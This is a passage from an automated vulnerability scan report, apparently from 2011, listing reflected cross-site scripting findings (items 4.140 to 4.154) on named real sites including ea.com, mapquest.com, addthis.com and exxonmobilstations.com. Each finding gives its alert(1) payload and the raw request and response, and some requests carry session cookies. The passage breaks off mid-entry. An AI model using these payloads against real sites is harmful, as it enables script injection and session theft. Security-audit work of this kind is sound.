<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/567d0"><script>alert(1)</script>98d32ffa9bc" />
...[SNIP]...

4.140. http://web-static.ea.com/us/portal/js/jquery/jquery.pagination.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.pagination.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831bd"><script>alert(1)</script>7497a0ae74c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/831bd"><script>alert(1)</script>7497a0ae74c?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/831bd"><script>alert(1)</script>7497a0ae74c" />
...[SNIP]...

4.141. http://web-static.ea.com/us/portal/js/jquery/jquery.slider.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.slider.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cef64"><script>alert(1)</script>b67955c2239 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/cef64"><script>alert(1)</script>b67955c2239?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/cef64"><script>alert(1)</script>b67955c2239" />
...[SNIP]...

4.142. http://web-static.ea.com/us/portal/js/jquery/jquery.sortlist.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.sortlist.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59635"><script>alert(1)</script>cbba35aa5c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/59635"><script>alert(1)</script>cbba35aa5c1?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/59635"><script>alert(1)</script>cbba35aa5c1" />
...[SNIP]...

4.143. http://web-static.ea.com/us/portal/js/jquery/jquery.spotlight.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.spotlight.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abc04"><script>alert(1)</script>e547221dfcb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/abc04"><script>alert(1)</script>e547221dfcb?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/abc04"><script>alert(1)</script>e547221dfcb" />
...[SNIP]...

4.144. http://web-static.ea.com/us/portal/js/jquery/jquery.tab.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.tab.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 160c2"><script>alert(1)</script>31a872bdf89 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/160c2"><script>alert(1)</script>31a872bdf89?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/160c2"><script>alert(1)</script>31a872bdf89" />
...[SNIP]...

4.145. http://web-static.ea.com/us/portal/js/jquery/jquery.validate-1.5.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.validate-1.5.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 100bf"><script>alert(1)</script>17b3cdbf2ef was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/100bf"><script>alert(1)</script>17b3cdbf2ef?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:17 GMT
Date: Fri, 24 Jun 2011 14:09:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/100bf"><script>alert(1)</script>17b3cdbf2ef" />
...[SNIP]...

4.146. http://web-static.ea.com/us/portal/js/swfobject/swfobject.min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/swfobject/swfobject.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bcc7"><script>alert(1)</script>58f3214276b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/swfobject/4bcc7"><script>alert(1)</script>58f3214276b?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30489
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/swfobject/4bcc7"><script>alert(1)</script>58f3214276b" />
...[SNIP]...

4.147. http://web.sa.mapquest.com/mobil1/ [tempset parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sa.mapquest.com
Path:   /mobil1/

Issue detail

The value of the tempset request parameter is copied into the HTML document as plain text between tags. The payload d16b2<script>alert(1)</script>d862442eea2 was submitted in the tempset parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobil1/?tempset=searchd16b2<script>alert(1)</script>d862442eea2 HTTP/1.1
Host: web.sa.mapquest.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/lubricants.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
MIME-Version: 1.0
Date: Fri, 24 Jun 2011 13:32:47 GMT
Server: AOLserver/4.0.10
Content-Type: text/html; charset=iso-8859-1
ntCoent-Length: 80
Connection: close
Content-Length: 80


Could not locate searchd16b2<script>alert(1)</script>d862442eea2_query.html



4.148. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a6950<script>alert(1)</script>c6127f288fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpa6950<script>alert(1)</script>c6127f288fe?v=250&winname=addthis&pub=asepyanm&source=tbx-250,max-250&lng=en&s=hotmail&url=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2Ftelkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html&title=TELKOM%20-%20Telkom%20Meraih%20IMAC%20Award%20sebagai%20The%20Best%20Provider%20and%20Telecommuncation&ate=AT-asepyanm/-/-/4e048e7fb62f9138/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2F&tt=0 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; uid=4dce8a530508b02d; psc=3; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921511.3N|1308911539.1EY|1308911539.60|1308911539.1FE|1308911539.1WV|1308225884.1VV|1308225884.19F|1306359996.1OD; bt=1308921511|00004N010; dt=X; ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxBAAv8wVi; sshs=facebook; Coyote-2-a0f0083=a0f02a8:0

Response

HTTP/1.0 404 Not Found
Date: Fri, 24 Jun 2011 13:19:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Content-Length: 1906
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpa6950<script>alert(1)</script>c6127f288fe?v=250&winname=addthis&pub=asepyanm&source=tbx-250,max-250&lng=en&s=hotmail&url=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2Ftelkom-meraih-imac-award-sebagai-the-best-provider-and-telec
...[SNIP]...

4.149. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89132"-alert(1)-"54224a98369 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php89132"-alert(1)-"54224a98369?v=250&winname=addthis&pub=asepyanm&source=tbx-250,max-250&lng=en&s=hotmail&url=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2Ftelkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html&title=TELKOM%20-%20Telkom%20Meraih%20IMAC%20Award%20sebagai%20The%20Best%20Provider%20and%20Telecommuncation&ate=AT-asepyanm/-/-/4e048e7fb62f9138/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2F&tt=0 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; uid=4dce8a530508b02d; psc=3; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921511.3N|1308911539.1EY|1308911539.60|1308911539.1FE|1308911539.1WV|1308225884.1VV|1308225884.19F|1306359996.1OD; bt=1308921511|00004N010; dt=X; ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxBAAv8wVi; sshs=facebook; Coyote-2-a0f0083=a0f02a8:0

Response

HTTP/1.0 404 Not Found
Date: Fri, 24 Jun 2011 13:19:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Content-Length: 1880
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php89132"-alert(1)-"54224a98369?source=tbx-250%2Cmax-250";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</sc
...[SNIP]...

4.150. http://www.ea.com/json/user-menu [returnUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ea.com
Path:   /json/user-menu

Issue detail

The value of the returnUrl request parameter is copied into the HTML document as plain text between tags. The payload 18bd9<img%20src%3da%20onerror%3dalert(1)>2c4a66b853f was submitted in the returnUrl parameter. This input was echoed as 18bd9<img src=a onerror=alert(1)>2c4a66b853f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /json/user-menu?returnUrl=http%3A%2F%2Fwww.ea.com%2F1%2Fproduct-eulas18bd9<img%20src%3da%20onerror%3dalert(1)>2c4a66b853f&_=1308923169682 HTTP/1.1
Host: www.ea.com
Proxy-Connection: keep-alive
Referer: http://www.ea.com/1/product-eulas
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A//www.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 727
Content-Type: text/html; charset=utf-8

{"html":"<div id=\"mod-user-menu\">\n\t<div class=\"mod-header\"><\/div>\n\t<div class=\"mod-content\">\n\t\t<div class=\"content\">\n\t\t\t<ul>\n\t\t\t<li class=\"login\" title=\"Login\"><a href=\"https:\/\/www.ea.com\/profile\/login?returnurl=http:\/\/www.ea.com\/1\/product-eulas18bd9<img src=a onerror=alert(1)>2c4a66b853f\" id=\"mod-user-menu-login\">
...[SNIP]...

4.151. http://www.exxonmobilstations.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ce8fd<script>alert(1)</script>e6edce38167 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoce8fd<script>alert(1)</script>e6edce38167 HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65; style=medium

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:55:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 343
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.icoce8fd<script>alert(1)</script>e6edce38167 was not found on this server.</p>
...[SNIP]...

4.152. http://www.exxonmobilstations.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bccb9<script>alert(1)</script>ded9f352e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?bccb9<script>alert(1)</script>ded9f352e0=1 HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65; style=medium

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:55:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 345
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico?bccb9<script>alert(1)</script>ded9f352e0=1 was not found on this server.</p>
...[SNIP]...

4.153. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /imag/exxonmobil.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 273a9<script>alert(1)</script>4cecfd08359 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imag273a9<script>alert(1)</script>4cecfd08359/exxonmobil.ico HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:32:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 351
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /imag273a9<script>alert(1)</script>4cecfd08359/exxonmobil.ico was not found on this server.</p>
...[SNIP]...

4.154. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /imag/exxonmobil.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65346<script>alert(1)</script>2d65368a743 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

